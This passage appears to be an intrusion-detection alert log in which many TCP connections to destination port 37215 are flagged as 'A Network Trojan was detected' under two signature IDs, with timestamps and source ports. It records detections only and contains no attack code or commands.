            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.825265
            SID:2835222
            Source Port:54492
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755772
            SID:2829579
            Source Port:47506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.909872
            SID:2835222
            Source Port:60332
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.620490
            SID:2835222
            Source Port:59180
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.840147
            SID:2829579
            Source Port:53452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.470377
            SID:2835222
            Source Port:52148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.180732
            SID:2835222
            Source Port:54918
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.891649
            SID:2835222
            Source Port:55452
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.512849
            SID:2829579
            Source Port:47526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.846957
            SID:2829579
            Source Port:49882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.443194
            SID:2835222
            Source Port:59988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954707
            SID:2829579
            Source Port:54952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.808334
            SID:2835222
            Source Port:60930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995532
            SID:2829579
            Source Port:48160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.344108
            SID:2829579
            Source Port:47390
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.469493
            SID:2829579
            Source Port:49268
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.275303
            SID:2835222
            Source Port:48100
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.442391
            SID:2829579
            Source Port:55554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.309657
            SID:2835222
            Source Port:44942
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.812337
            SID:2829579
            Source Port:51634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870872
            SID:2829579
            Source Port:43476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.766467
            SID:2829579
            Source Port:59822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.764718
            SID:2835222
            Source Port:60926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.650192
            SID:2835222
            Source Port:49166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:52.646237
            SID:2829579
            Source Port:42798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.966932
            SID:2829579
            Source Port:43938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.486020
            SID:2829579
            Source Port:34228
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.880521
            SID:2835222
            Source Port:54554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.970239
            SID:2829579
            Source Port:39500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.899797
            SID:2835222
            Source Port:44374
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.138272
            SID:2835222
            Source Port:56968
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989816
            SID:2829579
            Source Port:48586
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.905597
            SID:2835222
            Source Port:50954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.877596
            SID:2835222
            Source Port:57216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.611428
            SID:2829579
            Source Port:52832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.871175
            SID:2835222
            Source Port:56336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.934073
            SID:2829579
            Source Port:39610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.277512
            SID:2829579
            Source Port:43912
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.436643
            SID:2829579
            Source Port:58926
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:04.899443
            SID:2835222
            Source Port:35218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989230
            SID:2835222
            Source Port:41072
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.380666
            SID:2835222
            Source Port:40660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541873
            SID:2835222
            Source Port:55538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.900537
            SID:2835222
            Source Port:35106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.710079
            SID:2829579
            Source Port:38314
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.848869
            SID:2829579
            Source Port:54296
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.879876
            SID:2835222
            Source Port:43658
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.308808
            SID:2835222
            Source Port:56352
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.621602
            SID:2829579
            Source Port:43224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.828033
            SID:2829579
            Source Port:49356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.948308
            SID:2835222
            Source Port:45510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808234
            SID:2835222
            Source Port:58538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.584725
            SID:2829579
            Source Port:42976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.856383
            SID:2835222
            Source Port:58510
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.376238
            SID:2829579
            Source Port:57186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.507010
            SID:2835222
            Source Port:51072
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.876219
            SID:2829579
            Source Port:54708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.068603
            SID:2829579
            Source Port:56788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.293559
            SID:2829579
            Source Port:55488
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.332442
            SID:2829579
            Source Port:36708
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.746372
            SID:2829579
            Source Port:47838
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.510785
            SID:2829579
            Source Port:37962
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.937155
            SID:2829579
            Source Port:52638
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:15.969302
            SID:2829579
            Source Port:33526
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.917659
            SID:2829579
            Source Port:34200
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.989774
            SID:2835222
            Source Port:43760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.853686
            SID:2835222
            Source Port:57578
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:57.697283
            SID:2835222
            Source Port:33016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.969174
            SID:2835222
            Source Port:39598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.932040
            SID:2829579
            Source Port:34676
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.524477
            SID:2835222
            Source Port:58078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.786632
            SID:2829579
            Source Port:60810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.858824
            SID:2835222
            Source Port:47034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.058121
            SID:2829579
            Source Port:38310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.065245
            SID:2835222
            Source Port:39368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930218
            SID:2835222
            Source Port:32996
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.988366
            SID:2835222
            Source Port:51518
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919640
            SID:2829579
            Source Port:56864
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639829
            SID:2835222
            Source Port:46730
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767014
            SID:2829579
            Source Port:50966
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.534004
            SID:2829579
            Source Port:46632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:02.811242
            SID:2835222
            Source Port:56370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.862220
            SID:2829579
            Source Port:34798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.617665
            SID:2829579
            Source Port:41934
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848392
            SID:2829579
            Source Port:37020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.376930
            SID:2835222
            Source Port:41466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.376316
            SID:2835222
            Source Port:49904
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.849634
            SID:2829579
            Source Port:47124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.300113
            SID:2835222
            Source Port:46734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870225
            SID:2829579
            Source Port:39654
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.870475
            SID:2835222
            Source Port:47810
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.932079
            SID:2829579
            Source Port:48604
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.923613
            SID:2835222
            Source Port:38058
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.948674
            SID:2829579
            Source Port:50026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:18.046834
            SID:2829579
            Source Port:40822
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.388863
            SID:2829579
            Source Port:56252
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.821831
            SID:2829579
            Source Port:37550
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995566
            SID:2829579
            Source Port:45630
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.744383
            SID:2829579
            Source Port:45674
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.954582
            SID:2829579
            Source Port:53828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.776741
            SID:2829579
            Source Port:50418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:19.018739
            SID:2829579
            Source Port:59598
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.661917
            SID:2835222
            Source Port:34054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.295984
            SID:2835222
            Source Port:33362
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.778395
            SID:2835222
            Source Port:56360
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.000135
            SID:2835222
            Source Port:45226
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.899849
            SID:2835222
            Source Port:36082
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639545
            SID:2835222
            Source Port:45466
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.842745
            SID:2829579
            Source Port:48764
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.073246
            SID:2829579
            Source Port:51660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:47.601762
            SID:2829579
            Source Port:33078
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.748234
            SID:2835222
            Source Port:34742
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.882526
            SID:2829579
            Source Port:51998
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.278098
            SID:2829579
            Source Port:46350
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669571
            SID:2835222
            Source Port:41804
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.541606
            SID:2835222
            Source Port:33544
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.988954
            SID:2835222
            Source Port:37952
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.885744
            SID:2829579
            Source Port:59382
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.003934
            SID:2829579
            Source Port:33734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261418
            SID:2835222
            Source Port:58624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:17.011177
            SID:2835222
            Source Port:49596
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.617665
            SID:2835222
            Source Port:58462
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.064071
            SID:2829579
            Source Port:55374
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.373781
            SID:2835222
            Source Port:32932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:16.994776
            SID:2835222
            Source Port:39514
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:08.927161
            SID:2829579
            Source Port:56066
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.767971
            SID:2829579
            Source Port:50626
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.936060
            SID:2835222
            Source Port:56384
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.953000
            SID:2835222
            Source Port:55396
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.793566
            SID:2829579
            Source Port:52112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.021657
            SID:2835222
            Source Port:56456
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.765884
            SID:2835222
            Source Port:49034
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.761615
            SID:2835222
            Source Port:51126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.918655
            SID:2835222
            Source Port:51590
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.321431
            SID:2835222
            Source Port:55322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994764
            SID:2835222
            Source Port:50170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995274
            SID:2829579
            Source Port:41136
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:23.194115
            SID:2829579
            Source Port:34504
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.885489
            SID:2835222
            Source Port:53310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:38.303662
            SID:2835222
            Source Port:50112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.392554
            SID:2835222
            Source Port:37244
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.857082
            SID:2835222
            Source Port:57930
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.509767
            SID:2829579
            Source Port:34946
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.923536
            SID:2835222
            Source Port:40896
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.556258
            SID:2835222
            Source Port:40762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.691821
            SID:2829579
            Source Port:49878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.040788
            SID:2835222
            Source Port:49782
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.912886
            SID:2835222
            Source Port:53194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.038052
            SID:2829579
            Source Port:36560
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.543166
            SID:2829579
            Source Port:51310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.853259
            SID:2835222
            Source Port:50404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.989038
            SID:2835222
            Source Port:53878
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052723
            SID:2835222
            Source Port:42658
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:54.661629
            SID:2835222
            Source Port:36846
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.755972
            SID:2835222
            Source Port:36984
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.646331
            SID:2835222
            Source Port:39618
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.540456
            SID:2829579
            Source Port:47204
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:50.596884
            SID:2835222
            Source Port:55692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.670974
            SID:2829579
            Source Port:56028
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:13.989249
            SID:2835222
            Source Port:55570
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.435201
            SID:2829579
            Source Port:39662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735676
            SID:2835222
            Source Port:43704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869738
            SID:2835222
            Source Port:57770
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.387759
            SID:2829579
            Source Port:43158
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.518999
            SID:2829579
            Source Port:58406
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.836517
            SID:2829579
            Source Port:57812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809657
            SID:2829579
            Source Port:46080
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:50.640516
            SID:2835222
            Source Port:51884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.809380
            SID:2835222
            Source Port:50832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.052554
            SID:2829579
            Source Port:33378
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.070180
            SID:2829579
            Source Port:54874
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.777089
            SID:2829579
            Source Port:44336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.300145
            SID:2835222
            Source Port:49602
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.993385
            SID:2835222
            Source Port:54334
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507078
            SID:2829579
            Source Port:35600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.804018
            SID:2835222
            Source Port:60790
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:26.152999
            SID:2829579
            Source Port:57840
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.568275
            SID:2829579
            Source Port:56106
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.411279
            SID:2829579
            Source Port:34490
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.492905
            SID:2835222
            Source Port:50932
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.776339
            SID:2829579
            Source Port:58266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.933781
            SID:2829579
            Source Port:47980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.559917
            SID:2829579
            Source Port:47886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777665
            SID:2835222
            Source Port:49130
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.058316
            SID:2835222
            Source Port:55752
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:44.507880
            SID:2835222
            Source Port:60386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.543231
            SID:2829579
            Source Port:56928
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.930797
            SID:2835222
            Source Port:45026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:37.470772
            SID:2835222
            Source Port:58664
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.068306
            SID:2835222
            Source Port:43506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.067297
            SID:2829579
            Source Port:55380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.686001
            SID:2829579
            Source Port:58322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.715012
            SID:2829579
            Source Port:55522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.754851
            SID:2829579
            Source Port:36980
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.858323
            SID:2835222
            Source Port:40534
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.831608
            SID:2829579
            Source Port:35386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:07.905804
            SID:2835222
            Source Port:46890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
